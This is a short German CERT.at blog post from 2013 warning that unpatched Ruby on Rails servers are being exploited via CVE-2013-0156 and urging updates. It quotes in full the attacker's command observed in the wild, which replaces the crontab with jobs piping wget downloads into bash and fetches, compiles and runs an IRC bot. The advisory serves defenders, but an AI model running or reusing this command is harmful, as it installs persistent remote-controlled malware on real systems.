Deutsch | English
Dieser Blog enthält keine offiziellen Aussagen von CERT.at, sondern persönliche Meinungen einzelner Mitarbeiter.

Ruby on Rails updaten

29. Mai 2013

Bereits Anfang Jänner haben wir auf Updates für Ruby on Rails hingewiesen mit welchen Lücken (CVE-2013-0156) geschlossen wurden die es Angreifern ermöglichten über speziell formatierte POST-Requests Code einzuschleusen und auszuführen.

Wie Jeff Jarmoc in seinem Blog nun erörtert, ist anscheinend noch immer eine Vielzahl von veralteten RoR-Installationen im Einsatz auf welche es Angreifer nun abgesehen haben und die o.g. Lücke ausnutzen.
Dabei wird versucht folgende Befehle auszuführen:
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k
Dadurch wird der Bot (k.c) heruntergeladen, kompiliert und ausgeführt - der Bot versucht sich daraufhin zu einem IRC-Server auf cvv4you.ru (Dieser ist mittlerweile nicht mehr zu erreichen) zu verbinden um sich neue Befehle abzuholen.

Ich weise nochmal darauf hin, Ruby on Rails-Installationen auf die aktuellen Versionen (3.2.13, 3.1.12, 2.3.18) upzudaten.

Autor:

Email: reports@cert.at
Tel.: +43 1 5056416 78
mehr ...
Kritische Sicherheitslücke in Mailserver-Software Exim - Patches verfügbar
6. September 2019 | Beschreibung Das ...
Kritische Schwachstelle in bzip2 - je nach Setup für RCE ausnutzbar
24. Juni 2019 | Beschreibung In ...
mehr ...
Remote Desktop Services. Mal wieder.
14. August 2019 | Ich ...
BlueKeep, mal wieder
25. Juli 2019 | Das "Schöne" ...
mehr ...
Jahresbericht 2017
Ein Resumee zur digitalen Sicherheitslage in Österreich

(HTML, PDF).
Letzte Änderung: 2013/5/29 - 12:05:44
Haftungsausschluss / Datenschutzerklärung